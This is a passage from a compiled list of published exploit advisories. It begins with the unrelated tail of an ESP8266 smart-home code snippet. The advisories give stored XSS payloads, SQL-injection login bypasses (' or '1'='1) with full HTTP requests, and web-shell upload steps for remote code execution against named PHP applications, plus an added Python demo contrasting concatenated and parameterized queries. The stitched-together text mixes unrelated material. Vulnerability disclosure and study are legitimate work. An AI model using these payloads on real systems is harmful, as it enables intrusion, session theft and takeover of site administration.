          Blinker.begin(auth, ssid, pswd);
          Blinker.attachData(dataRead);

          Button1.attach(button1_callback);
          BlinkerMIOT.attachPowerState(miotPowerState2);
      }

      void loop()
      {
          Blinker.run();
      }

      Video Demo

      Problem to be solved

      At present, the problem is how to power the esp8266. I thought of directly using the voltage of the indicator light to power the ESP. However, the voltage was measured with a voltmeter and found to be 25 V. The voltage is too high, so a resistor is required in series, but there is no suitable resistor available on hand. So let it go for now!
  19. # Exploit Title: Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting
      # Date: 26-11-2020
      # Exploit Author: Parshwa Bhavsar
      # Vendor Homepage: https://www.sourcecodester.com/
      # Software Link: https://www.sourcecodester.com/php/14609/bakeshop-online-ordering-system-phpmysqli-full-source-code.html
      # Version: 1.0
      # Tested on: Windows 10/XAMPP

      Payload : "><img src=x onerror=alert(1)>

      Steps to Reproduce :-
      1. Log in to the admin dashboard & click on 'Categories'.
      2. You will notice the "New" button; click on that and you will notice the "Category" input field.
      3. Put the XSS payload in that field and save it.
      4. The XSS will be triggered.
  20. # Exploit Title: NewsLister - Authenticated Persistent Cross-Site Scripting
      # Date: 2020-11-27
      # Exploit Author: Emre Aslan
      # Vendor Homepage: https://www.netartmedia.net/newslister.html
      # Tested on: Windows & XAMPP

      ==> PoC <==
      1- Log in to the admin panel.
      2- Enter the payload in the title value.
      3- View the news. The XSS will be executed.

      ==> HTTP Request <==

      GET /admin/index.php?page=add HTTP/1.1
      Host: 127.0.0.1:8080
      Connection: keep-alive
      Cache-Control: max-age=0
      Upgrade-Insecure-Requests: 1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      Sec-Fetch-Site: same-origin
      Sec-Fetch-Mode: navigate
      Sec-Fetch-User: ?1
      Sec-Fetch-Dest: document
      Referer: host/admin/index.php?page=home
      Accept-Encoding: gzip, deflate, br
      Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
      Cookie: AuthUser=administrator~da1907216877e31462c14b35db67de32~1606484275; PHPSESSID=nn5gq66nla4lfs47fq9eoctvuf
  21. # Exploit Title: Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass
      # Date: 21/11/2020
      # Exploit Author: Aditya Wakhlu
      # Vendor Homepage: https://www.sourcecodester.com/php/14607/local-service-search-engine-management-system-using-phpmysqli-source-code.html
      # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lssems.zip
      # Version: 1.0
      # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
      # CVE: CVE-2021-3278

      Step 1: Open the URL http://localhost:8080/lssems/admin/login.php
      Step 2: Use the payload Aditya' or 1=1# in the user and password fields

      Malicious Request:::

      POST /lssems/admin/ajax.php?action=login HTTP/1.1
      Host: localhost:8080
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
      Accept: */*
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      X-Requested-With: XMLHttpRequest
      Content-Length: 49
      Origin: http://localhost:8080
      Connection: close
      Referer: http://localhost:8080/lssems/admin/login.php
      Cookie: PHPSESSID=mpqu31slfcd7fjc89gm9veb1o3

      username=Aditya'+or+1%3D1%23&password=Aditya'+or+1%3D1%23
  22. # Exploit Title: WonderCMS 3.1.3 - 'menu' Persistent Cross-Site Scripting
      # Date: 20-11-2020
      # Exploit Author: Hemant Patidar (HemantSolo)
      # Vendor Homepage: https://www.wondercms.com/
      # Version: 3.1.3
      # Tested on: Windows 10/Kali Linux
      # Contact: https://www.linkedin.com/in/hemantsolo/
      # CVE: CVE-2020-29469

      Attack vector:
      This vulnerability allows an attacker to inject the XSS payload in the Settings - Menu, and each time any user visits the website directory the XSS triggers and the attacker is able to steal the cookie according to the crafted payload.

      Vulnerable Parameters: Menu.

      Steps-To-Reproduce:
      1. Go to the Simple website builder.
      2. Put this payload in Menu: "hemantsolo"><img src=x onerror=confirm(1)>"
      3. Now go to the website and the XSS will be triggered.

      GET /demo/hemantsolo-img-src-x-onerror-confirm-1 HTTP/1.1
      Host: 127.0.0.1
      Connection: close
      Cache-Control: max-age=0
      Upgrade-Insecure-Requests: 1
      DNT: 1
      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      Sec-Fetch-Site: same-origin
      Sec-Fetch-Mode: navigate
      Sec-Fetch-User: ?1
      Sec-Fetch-Dest: document
      Referer: 127.0.0.1/demo/hemantsolo-img-src-x-onerror-confirm-1
      Accept-Encoding: gzip, deflate
      Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
      Cookie: PHPSESSID=31ce0448562cc182b5173a300a923b93
  23. # Exploit Title: Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated)
      # Date: November 17th, 2020
      # Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
      # Vendor Homepage: Source Code & Projects (https://code-projects.org)
      # Software Link: https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf
      # Version: 1.0
      # Tested On: Windows 10 (XAMPP Server)
      # CVE: CVE-2020-28688

      ---------------------
      Proof of Concept:
      ---------------------
      1. Authenticate as a user (or signup as an artist)
      2. Click the drop down for your username and go to My ART+BAY
      3. Click on My Artworks > My Available Artworks > Add an Artwork
      4. Click on any type of artwork and instead of the picture, upload your php-shell > click on upload
      5. Find your shell at 'http://<ip>/<base_url>/pictures/arts/<shell.php>' and get command execution
  24. # Exploit Title: Employee Record Management System 1.1 - Login Bypass SQL Injection
      # Date: 2020-11-17
      # Exploit Author: Anurag Kumar Rawat(A1C3VENOM)
      # Vendor Homepage: https://phpgurukul.com
      # Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/
      # Version: 1.1
      # Tested on Parrot os(Linux)

      Attack Vector:
      An attacker can gain admin panel access using malicious SQL injection queries.

      Steps to reproduce:
      1. Open the admin login page using the following URL:
         -> http://localhost/erms/admin/index.php
      2. Now put the payload below in both fields (User ID & Password)
         Payload: ' or '1'='1
      3. The server accepts this payload and the attacker successfully bypasses the admin panel without any credentials
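      Why the login-bypass payload in items 6, 8, 21 and 24 works, and the fix, as an added example that is not code from any of those posts: the vulnerable function concatenates the form fields into the query the way the affected PHP login pages do, the safe one binds them as parameters. It uses an in-memory SQLite table with a made-up admin credential in place of the projects' MySQL databases (SQLite has no `#` comment, so the `' or '1'='1` payload is the one demonstrated).

      ```python
      import sqlite3


      def make_db():
          """Constructed admin table with one dummy account."""
          con = sqlite3.connect(":memory:")
          con.execute("CREATE TABLE admin (username TEXT, password TEXT)")
          con.execute("INSERT INTO admin VALUES ('admin', 'S3cretPass!')")
          return con


      def rendered_query(username, password):
          """The SQL text the vulnerable login actually sends to the database."""
          return ("SELECT COUNT(*) FROM admin WHERE username='{}' AND password='{}'"
                  .format(username, password))


      def login_vulnerable(con, username, password):
          """String-concatenated query: the quote in the payload closes the literal
          and the rest becomes SQL (OR '1'='1' is always true)."""
          return con.execute(rendered_query(username, password)).fetchone()[0] > 0


      def login_safe(con, username, password):
          """Parameterized query: the payload is compared as a value, never parsed as SQL."""
          sql = "SELECT COUNT(*) FROM admin WHERE username=? AND password=?"
          return con.execute(sql, (username, password)).fetchone()[0] > 0


      if __name__ == "__main__":
          con = make_db()
          payload = "' or '1'='1"
          print(rendered_query(payload, payload))
          print("vulnerable login with payload:", login_vulnerable(con, payload, payload))
          print("parameterized login with payload:", login_safe(con, payload, payload))
      ```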
  25. # Exploit Title: Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile
      # Date: November 17th, 2020
      # Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
      # Vendor Homepage: Source Code & Projects (https://code-projects.org)
      # Software Link: https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf
      # Version: 1.0
      # Tested On: Windows 10 (XAMPP Server)
      # CVE: CVE-2020-28687

      --------------------
      Proof of Concept:
      --------------------
      1. Authenticate as a user (or signup as an artist)
      2. Go to edit profile
      3. Upload a php-shell as profile picture and click update/save
      4. Find your shell at 'http://<ip>/<base_url>/pictures/profile/<shell.php>' and get command execution